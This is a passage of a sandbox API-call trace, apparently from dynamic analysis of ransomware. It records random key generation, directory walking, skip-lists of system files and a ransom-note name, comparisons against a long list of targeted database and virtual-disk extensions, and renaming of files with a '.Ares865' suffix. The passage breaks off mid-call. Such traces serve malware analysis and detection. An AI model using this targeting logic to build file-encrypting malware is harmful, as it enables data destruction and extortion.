dwFlags=0x0) returned 1 [0058.570] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e0, lpName=0x0) returned 0x120 [0058.571] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e0) returned 0x190000 [0058.573] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.574] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.574] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.574] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.574] CloseHandle (hObject=0x120) returned 1 [0058.574] CloseHandle (hObject=0x15c) returned 1 [0058.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.576] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d3d87bb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d424a7b, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="aoldtz.exe") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="..") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="windows") returned -1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="bootmgr") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="temp") returned -1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="pagefile.sys") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="boot") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ids.txt") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="ntuser.dat") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="perflogs") returned 1 [0058.576] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2="MSBuild") returned 1 [0058.576] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0058.576] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk") returned 101 [0058.576] lstrcpyW (in: lpString1=0x2cce486, lpString2="Private Character Editor.lnk" | out: lpString1="Private Character Editor.lnk") returned="Private Character Editor.lnk" [0058.576] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0058.576] lstrlenW (lpString="Ares865") returned 7 [0058.576] lstrcmpiW (lpString1="tor.lnk", lpString2="Ares865") returned 1 [0058.576] lstrlenW (lpString=".dll") returned 4 [0058.577] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".dll") returned 1 [0058.577] lstrlenW (lpString=".lnk") returned 4 [0058.577] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".lnk") returned 1 [0058.577] lstrlenW (lpString=".ini") returned 4 [0058.577] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".ini") returned 1 [0058.577] lstrlenW (lpString=".sys") returned 4 [0058.577] lstrcmpiW (lpString1="Private Character Editor.lnk", lpString2=".sys") returned 1 [0058.577] lstrlenW (lpString="Private Character Editor.lnk") returned 28 [0058.577] lstrlenW (lpString="bak") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.577] lstrlenW (lpString="ba_") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.577] lstrlenW (lpString="dbb") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.577] lstrlenW (lpString="vmdk") returned 4 [0058.577] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.577] lstrlenW (lpString="rar") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.577] lstrlenW (lpString="zip") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.577] lstrlenW (lpString="tgz") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.577] lstrlenW (lpString="vbox") returned 4 [0058.577] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.577] lstrlenW (lpString="vdi") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.577] lstrlenW (lpString="vhd") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.577] lstrlenW (lpString="vhdx") returned 4 [0058.577] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.577] lstrlenW (lpString="avhd") returned 4 [0058.577] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.577] lstrlenW (lpString="db") returned 2 [0058.577] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.577] lstrlenW (lpString="db2") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.577] lstrlenW (lpString="db3") returned 3 [0058.577] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.578] lstrlenW (lpString="dbf") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.578] lstrlenW (lpString="mdf") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.578] lstrlenW (lpString="mdb") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.578] lstrlenW (lpString="sql") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.578] lstrlenW (lpString="sqlite") returned 6 [0058.578] lstrcmpiW (lpString1="or.lnk", lpString2="sqlite") returned -1 [0058.578] lstrlenW (lpString="sqlite3") returned 7 [0058.578] lstrcmpiW (lpString1="tor.lnk", lpString2="sqlite3") returned 1 [0058.578] lstrlenW (lpString="sqlitedb") returned 8 [0058.578] lstrcmpiW (lpString1="itor.lnk", lpString2="sqlitedb") returned -1 [0058.578] lstrlenW (lpString="xml") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.578] lstrlenW (lpString="$er") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.578] lstrlenW (lpString="4dd") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.578] lstrlenW (lpString="4dl") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.578] lstrlenW (lpString="^^^") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.578] lstrlenW (lpString="abs") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.578] lstrlenW (lpString="abx") returned 3 [0058.578] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.578] lstrlenW (lpString="accdb") returned 5 [0058.578] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0058.578] lstrlenW (lpString="accdc") returned 5 [0058.578] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0058.578] lstrlenW (lpString="accde") returned 5 [0058.578] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0058.578] lstrlenW (lpString="accdr") returned 5 [0058.578] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0058.579] lstrlenW (lpString="accdt") returned 5 [0058.579] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0058.579] lstrlenW (lpString="accdw") returned 5 [0058.579] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0058.579] lstrlenW (lpString="accft") returned 5 [0058.579] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0058.579] lstrlenW (lpString="adb") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.579] lstrlenW (lpString="adb") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.579] lstrlenW (lpString="ade") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.579] lstrlenW (lpString="adf") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.579] lstrlenW (lpString="adn") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.579] lstrlenW (lpString="adp") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.579] lstrlenW (lpString="alf") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.579] lstrlenW (lpString="ask") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.579] lstrlenW (lpString="btr") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.579] lstrlenW (lpString="cat") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.579] lstrlenW (lpString="cdb") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.579] lstrlenW (lpString="ckp") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.579] lstrlenW (lpString="cma") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.579] lstrlenW (lpString="cpd") returned 3 [0058.579] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.579] lstrlenW (lpString="dacpac") returned 6 [0058.579] lstrcmpiW (lpString1="or.lnk", lpString2="dacpac") returned 1 [0058.579] lstrlenW (lpString="dad") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.580] lstrlenW (lpString="dadiagrams") returned 10 [0058.580] lstrcmpiW (lpString1="Editor.lnk", lpString2="dadiagrams") returned 1 [0058.580] lstrlenW (lpString="daschema") returned 8 [0058.580] lstrcmpiW (lpString1="itor.lnk", lpString2="daschema") returned 1 [0058.580] lstrlenW (lpString="db-journal") returned 10 [0058.580] lstrcmpiW (lpString1="Editor.lnk", lpString2="db-journal") returned 1 [0058.580] lstrlenW (lpString="db-shm") returned 6 [0058.580] lstrcmpiW (lpString1="or.lnk", lpString2="db-shm") returned 1 [0058.580] lstrlenW (lpString="db-wal") returned 6 [0058.580] lstrcmpiW (lpString1="or.lnk", lpString2="db-wal") returned 1 [0058.580] lstrlenW (lpString="dbc") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.580] lstrlenW (lpString="dbs") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.580] lstrlenW (lpString="dbt") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.580] lstrlenW (lpString="dbv") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.580] lstrlenW (lpString="dbx") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.580] lstrlenW (lpString="dcb") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.580] lstrlenW (lpString="dct") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.580] lstrlenW (lpString="dcx") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.580] lstrlenW (lpString="ddl") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.580] lstrlenW (lpString="dlis") returned 4 [0058.580] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.580] lstrlenW (lpString="dp1") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.580] lstrlenW (lpString="dqy") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.580] lstrlenW (lpString="dsk") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.580] lstrlenW (lpString="dsn") returned 3 [0058.580] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.581] lstrlenW (lpString="dtsx") returned 4 [0058.581] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.581] lstrlenW (lpString="dxl") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.581] lstrlenW (lpString="eco") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.581] lstrlenW (lpString="ecx") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.581] lstrlenW (lpString="edb") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.581] lstrlenW (lpString="epim") returned 4 [0058.581] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.581] lstrlenW (lpString="fcd") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.581] lstrlenW (lpString="fdb") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.581] lstrlenW (lpString="fic") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.581] lstrlenW (lpString="flexolibrary") returned 12 [0058.581] lstrcmpiW (lpString1="r Editor.lnk", lpString2="flexolibrary") returned 1 [0058.581] lstrlenW (lpString="fm5") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.581] lstrlenW (lpString="fmp") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.581] lstrlenW (lpString="fmp12") returned 5 [0058.581] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0058.581] lstrlenW (lpString="fmpsl") returned 5 [0058.581] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0058.581] lstrlenW (lpString="fol") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.581] lstrlenW (lpString="fp3") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.581] lstrlenW (lpString="fp4") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.581] lstrlenW (lpString="fp5") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.581] lstrlenW (lpString="fp7") returned 3 [0058.581] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.582] lstrlenW (lpString="fpt") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.582] lstrlenW (lpString="frm") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.582] lstrlenW (lpString="gdb") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.582] lstrlenW (lpString="gdb") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.582] lstrlenW (lpString="grdb") returned 4 [0058.582] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.582] lstrlenW (lpString="gwi") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.582] lstrlenW (lpString="hdb") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.582] lstrlenW (lpString="his") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.582] lstrlenW (lpString="ib") returned 2 [0058.582] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.582] lstrlenW (lpString="idb") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.582] lstrlenW (lpString="ihx") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.582] lstrlenW (lpString="itdb") returned 4 [0058.582] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.582] lstrlenW (lpString="itw") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.582] lstrlenW (lpString="jet") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.582] lstrlenW (lpString="jtx") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.582] lstrlenW (lpString="kdb") returned 3 [0058.582] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.582] lstrlenW (lpString="kexi") returned 4 [0058.582] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.582] lstrlenW (lpString="kexic") returned 5 [0058.582] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0058.582] lstrlenW (lpString="kexis") returned 5 [0058.583] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0058.583] lstrlenW (lpString="lgc") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.583] lstrlenW (lpString="lwx") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.583] lstrlenW (lpString="maf") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.583] lstrlenW (lpString="maq") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.583] lstrlenW (lpString="mar") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.583] lstrlenW (lpString="marshal") returned 7 [0058.583] lstrcmpiW (lpString1="tor.lnk", lpString2="marshal") returned 1 [0058.583] lstrlenW (lpString="mas") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.583] lstrlenW (lpString="mav") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.583] lstrlenW (lpString="maw") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.583] lstrlenW (lpString="mdbhtml") returned 7 [0058.583] lstrcmpiW (lpString1="tor.lnk", lpString2="mdbhtml") returned 1 [0058.583] lstrlenW (lpString="mdn") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.583] lstrlenW (lpString="mdt") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.583] lstrlenW (lpString="mfd") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.583] lstrlenW (lpString="mpd") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.583] lstrlenW (lpString="mrg") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.583] lstrlenW (lpString="mud") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.583] lstrlenW (lpString="mwb") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.583] lstrlenW (lpString="myd") returned 3 [0058.583] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.584] lstrlenW (lpString="ndf") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.584] lstrlenW (lpString="nnt") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.584] lstrlenW (lpString="nrmlib") returned 6 [0058.584] lstrcmpiW (lpString1="or.lnk", lpString2="nrmlib") returned 1 [0058.584] lstrlenW (lpString="ns2") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.584] lstrlenW (lpString="ns3") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.584] lstrlenW (lpString="ns4") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.584] lstrlenW (lpString="nsf") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.584] lstrlenW (lpString="nv") returned 2 [0058.584] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.584] lstrlenW (lpString="nv2") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.584] lstrlenW (lpString="nwdb") returned 4 [0058.584] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.584] lstrlenW (lpString="nyf") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.584] lstrlenW (lpString="odb") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.584] lstrlenW (lpString="odb") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.584] lstrlenW (lpString="oqy") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.584] lstrlenW (lpString="ora") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.584] lstrlenW (lpString="orx") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.584] lstrlenW (lpString="owc") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.584] lstrlenW (lpString="p96") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.584] lstrlenW (lpString="p97") returned 3 [0058.584] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.585] lstrlenW (lpString="pan") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.585] lstrlenW (lpString="pdb") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.585] lstrlenW (lpString="pdm") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.585] lstrlenW (lpString="pnz") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.585] lstrlenW (lpString="qry") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.585] lstrlenW (lpString="qvd") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.585] lstrlenW (lpString="rbf") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.585] lstrlenW (lpString="rctd") returned 4 [0058.585] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.585] lstrlenW (lpString="rod") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.585] lstrlenW (lpString="rodx") returned 4 [0058.585] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.585] lstrlenW (lpString="rpd") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.585] lstrlenW (lpString="rsd") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.585] lstrlenW (lpString="sas7bdat") returned 8 [0058.585] lstrcmpiW (lpString1="itor.lnk", lpString2="sas7bdat") returned -1 [0058.585] lstrlenW (lpString="sbf") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.585] lstrlenW (lpString="scx") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.585] lstrlenW (lpString="sdb") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.585] lstrlenW (lpString="sdc") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.585] lstrlenW (lpString="sdf") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.585] lstrlenW (lpString="sis") returned 3 [0058.585] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.585] lstrlenW (lpString="spq") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.586] lstrlenW (lpString="te") returned 2 [0058.586] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.586] lstrlenW (lpString="teacher") returned 7 [0058.586] lstrcmpiW (lpString1="tor.lnk", lpString2="teacher") returned 1 [0058.586] lstrlenW (lpString="tmd") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.586] lstrlenW (lpString="tps") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.586] lstrlenW (lpString="trc") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.586] lstrlenW (lpString="trc") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.586] lstrlenW (lpString="trm") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.586] lstrlenW (lpString="udb") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.586] lstrlenW (lpString="udl") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.586] lstrlenW (lpString="usr") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.586] lstrlenW (lpString="v12") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.586] lstrlenW (lpString="vis") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.586] lstrlenW (lpString="vpd") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.586] lstrlenW (lpString="vvv") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.586] lstrlenW (lpString="wdb") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.586] lstrlenW (lpString="wmdb") returned 4 [0058.586] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.586] lstrlenW (lpString="wrk") returned 3 [0058.586] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.586] lstrlenW (lpString="xdb") returned 3 [0058.587] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.587] lstrlenW (lpString="xld") returned 3 [0058.587] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.587] lstrlenW (lpString="xmlff") returned 5 [0058.587] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0058.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk.Ares865") returned 103 [0058.587] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start 